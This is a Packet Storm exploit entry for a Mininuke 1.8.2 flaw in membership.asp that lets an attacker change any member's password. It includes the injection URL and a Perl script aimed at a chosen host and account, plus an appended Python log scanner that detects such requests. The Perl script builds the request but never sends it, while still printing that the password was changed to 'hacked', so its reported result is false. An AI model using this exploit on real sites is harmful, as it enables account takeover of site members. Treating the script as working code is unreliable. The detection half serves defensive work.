minimuke.pl.txt

2006-02-02T00:00:00
ID PACKETSTORM:43494
Type packetstorm
Reporter Mustafa Can Bjorn
Modified 2006-02-02T00:00:00

Description

                                        
`I created an exploit for a bug in Mininuke; this bug is in "membership.asp"  
and with this exploit you can change a member's password :)  
if you inject:  
" /membership.asp&pass=[New password]&passa=[confirm new password]&x=[member name] "  
This bug was found by nukedx & the exploit is by Hessam-x  
  
---------  
+ APP name : Mininuke  
+ Version : 1.8.2  
+ exploit by: Hessam-x  
+ Type : High  
+ Des : with this exploit you can change user's password  
+ IHST - Iran Hackerz Security Team (Hackerz.ir)  
+ KuT - Kachal667 under9round team (Kachal667.com)  
  
Exploit type : Perl  
[-- PERL C0DE --]  
  
  
#!/usr/bin/perl  
#--------------------------------------------------------#  
#- => Mininuke 1.8.2  
#- Founder nukedx & Exploit by Hessam-x  
#- www.Hackerz.ir Iran Hackers Security Team  
#- Hessam-x <> irc0d3r|at|Yahoo.com  
#- Spescial Thanx : all iranian Hackers & Str0ke  
#- IR4N H4CK3RZ S3CURITY T34M  
#--------------------------------------------------------#  
# This bug at Membership.asp  
use IO::Socket;  
  
if (@ARGV < 1)  
{  
print "\n============================================\n";  
print "\n IRAN HACKERZ SECURITY TEAM \n";  
print "\n============================================\n";  
print "\n ";  
print "\n MININUKE 1.8.2 ";  
print "\n Exploit by Hessam-x & Found by nukedx ";  
print "\n www.Hackerz.ir Iran Hackers Security Team ";  
print "\n ";  
print "\n============================================\n";  
print "Usage : minimuke.pl [HOST] [Member name]\n\n";  
  
print "Examples:\n\n";  
print " mininuke.pl www.Site.com admin \n";  
exit();  
}  
  
my $host = $ARGV[0];  
my $usero= $ARGV[1];  
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,  
PeerPort => "80" );  
  
unless ($remote) { die "Cannot connect to $host" }  
  
print "[+]connected\n";  
  
$addr = "GET /membership.asp?pass=hacked&passa=hacked&x=$usero&B1=Send HTTP/1.0\n";  
$addr .= "Host: $host\n\n\n\n";  
print "\n";  
print "[+]Wait...";  
sleep(5);  
print "Wait For Changing Password ...\n";  
print "[+] :D OK \n";  
print "Username: $usero\n";  
print "Password: hacked\n\n";  
  
[/-- PERL CODE --]  
  
# Hessam-x (Hessam M.Salehi)- www.hessam.org  
`
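Detection logic for the request described above, as an added example that is not part of the original advisory or exploit: it scans IIS W3C extended logs for requests to membership.asp whose query string carries `pass`, `passa` and `x` together. The log sample, its field layout and the function name are constructed assumptions.

```python
from urllib.parse import parse_qs

# Constructed IIS W3C extended log lines (addresses and member names are made up).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2006-02-03 10:01:12 192.0.2.10 GET /default.asp - 200
2006-02-03 10:01:40 192.0.2.10 GET /membership.asp pass=abc123&passa=abc123&x=admin&B1=Send 200
2006-02-03 10:02:05 198.51.100.7 GET /Membership.asp x=alice 200
2006-02-03 10:02:30 203.0.113.5 GET /MEMBERSHIP.ASP PASS=q&passa=q&x=bob%20smith 200
2006-02-03 10:03:00 198.51.100.7 POST /membership.asp - 200
"""

# Query parameters the advisory names for the password change request.
REQUIRED = {"pass", "passa", "x"}


def find_password_resets(log_text):
    """Return (client IP, targeted member, HTTP status) for every request to
    membership.asp whose query string carries pass, passa and x together."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]   # column names for the rows that follow
            continue
        if not line.strip() or line.startswith("#") or not fields:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue                    # malformed row, skip it
        rec = dict(zip(fields, parts))
        if not rec.get("cs-uri-stem", "").lower().endswith("/membership.asp"):
            continue
        # Classic ASP matches parameter names case-insensitively, so normalise.
        parsed = parse_qs(rec.get("cs-uri-query", ""), keep_blank_values=True)
        query = {k.lower(): v for k, v in parsed.items()}
        if REQUIRED <= query.keys():
            hits.append((rec.get("c-ip"), query["x"][0], rec.get("sc-status")))
    return hits


if __name__ == "__main__":
    for ip, member, status in find_password_resets(SAMPLE_LOG):
        print(f"password change for {member!r} from {ip} (HTTP {status})")
```

A hit with status 200 for a member who did not request the change is a reason to reset that account's password and review what the account did afterwards.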